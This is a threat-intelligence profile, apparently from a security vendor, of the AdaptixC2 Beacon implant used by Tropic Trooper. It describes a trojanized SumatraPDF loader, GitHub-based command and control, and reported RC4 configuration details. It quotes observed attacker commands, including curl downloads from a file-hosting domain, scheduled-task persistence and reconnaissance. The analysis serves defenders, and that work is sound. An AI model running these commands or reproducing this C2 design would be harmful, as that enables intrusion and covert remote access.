AdaptixC2 Beacon
AdaptixC2 Beacon is a post-exploitation agent observed in a campaign attributed with high confidence by Zscaler ThreatLabz to Tropic Trooper (also tracked as APT23, Earth Centaur, KeyBoy, and Pirate Panda). In the reported activity, victims were targeted via a ZIP archive containing military-themed lure documents and a trojanized SumatraPDF executable. When executed, the rogue SumatraPDF displayed a decoy PDF while covertly downloading and executing encrypted shellcode, using a modified TOSHIS loader, a Xiangoop variant previously linked to Tropic Trooper, to deploy the AdaptixC2 Beacon agent.
The malware was used against Chinese-speaking individuals, primarily in Taiwan, as well as targets in South Korea and Japan. Researchers described the campaign as a shift by Tropic Trooper from previously used payloads such as Cobalt Strike Beacon and Merlin Mythic agents to the open-source AdaptixC2 framework.
AdaptixC2 Beacon used a customized GitHub-based command-and-control listener. Reported configuration and behavior included use of api.github.com and the repository cvaS23uchsahs/rss, polling open GitHub issues for tasking, sending an initial encrypted beacon via POST to GitHub Issue #1, and uploading execution results back to repository contents paths under /contents/download/. The implant queried ipinfo.io to determine the victim’s external IP address before GitHub-based communications. Communications used RC4, including a reported configuration key of 7adf76418856966effc9ccf8a21d1b12 and a generated 16-byte RC4 session key. Researchers also observed rapid deletion of GitHub beacon artifacts, often within 10 seconds, which hindered decryption and forensic analysis.
Observed tasking indicated the implant was used mainly for reconnaissance and staging. Commands included network discovery such as arp /a and net view, as well as scheduled task creation for persistence. On selected high-value systems, operators subsequently deployed Microsoft Visual Studio Code and abused VS Code tunnels for interactive remote access. Associated infrastructure included staging server 158.247.193[.]100, which was also observed hosting Cobalt Strike Beacon and the EntryShell backdoor, both previously linked to Tropic Trooper.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Groups observed using it
1 distinct threat actor attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
This campaign deploys the AdaptixC2 Beacon post-exploitation agent, ultimately facilitating the misuse of Microsoft Visual Studio Code tunnels for remote access.
Techniques & procedures
22 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
1 techniqueThe attack begins with a ZIP archive containing military-themed lures to launch a rogue SumatraPDF version.
Execution
4 techniquesCommands observed by ThreatLabz included scheduled task creation for persistence... Monitor for unusual scheduled task creation using names that impersonate system services, such as “MSDNSvc” or “MicrosoftUDN.”
ThreatLabz observed the threat actor issuing the following commands: arp /a ... curl -O http://bashupload[.]app/6e1lhc ... schtasks /create ... wmic process where processid=8528 get commandline
This decoy application displays a fake PDF while secretly retrieving and executing encrypted shellcode.
When a victim runs this file, the loader quietly downloads and displays a convincing PDF lure... while simultaneously downloading and executing an AdaptixC2 Beacon agent in the background.
Persistence
1 techniquePrivilege Escalation
1 techniqueStealth
3 techniquesThis decoy application displays a fake PDF while secretly retrieving and executing encrypted shellcode.
TOSHIS loader then retrieves a second-stage shellcode from the same IP address, decrypts it using AES-128 CBC with WinCrypt cryptographic functions... The agent decodes its Base64-encoded contents... Each task in the queue is decrypted using the RC4 session key
...decrypts it using AES-128 CBC with WinCrypt cryptographic functions, and executes the shellcode directly in-memory.
Defense Impairment
1 techniqueThe campaign that ThreatLabz researchers observed used a trojanized SumatraPDF binary to deploy an AdaptixC2 Beacon and ultimately VS Code on targeted machines.
Discovery
5 techniquesCommands observed by ThreatLabz included scheduled task creation for persistence, network reconnaissance using arp and net view
The agent begins by retrieving its external IP address from ipinfo.io
tasklist | findstr /i note ... tasklist|findstr /i code.exe ... wmic process where processid=8528 get commandline
curl http://bashupload[.]app/zgel2a.bin -o v.zip & dir
Commands observed by ThreatLabz included scheduled task creation for persistence, network reconnaissance using arp and net view
Command and Control
7 techniquesThe campaign deploys the AdaptixC2 Beacon post-exploitation agent... utilizes a custom AdaptixC2 Beacon listener with GitHub as its command-and-control platform... The agent communicates via GitHub to receive commands.
the custom AdaptixC2 beacon listener to use GitHub as its command-and-control (C2) platform... the beacon interacts with a GitHub repository, reading task assignments from GitHub Issues and uploading results back to the same repository as file contents.
...custom beacon listener component, which utilizes GitHub as its C2 server... The figure below shows the layout of the GitHub repository used for C2.
A loader, TOSHIS, a variant of Xiangoop malware linked to Tropic Trooper, then deploys both the lure document and the AdaptixC2 Beacon agent.
sends back encrypted responses as Base64-encoded file uploads to the repository
Once a target is deemed valuable, attackers establish VS Code tunnels for remote access, sometimes installing alternative trojanized applications for camouflage.
It then sends an initial beacon via a POST request to GitHub Issue number 1, encrypted using an RC4 session key... All C2 traffic is encrypted using RC4
Exfiltration
1 techniqueAfter processing the task, the agent prepares a response payload... The entire buffer is Base64-encoded, and the agent uploads the buffer as a file to GitHub.
IOCs tracked for this family
3 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Recent activity
5 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A post-exploitation beacon/agent used in the campaign for command execution and remote access, communicating with a custom listener over GitHub-based command-and-control.
A post-exploitation agent used to establish command-and-control via GitHub, receive tasks, and support remote access operations on compromised hosts.
A beacon payload deployed via a trojanized SumatraPDF binary in a Tropic Trooper campaign.
An open-source offensive framework beacon used to gain persistent remote access. In this campaign, a custom beacon listener used GitHub as command-and-control by reading tasks from GitHub Issues and uploading encrypted results back to the repository, with RC4-encrypted traffic and rapid deletion of posted data.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.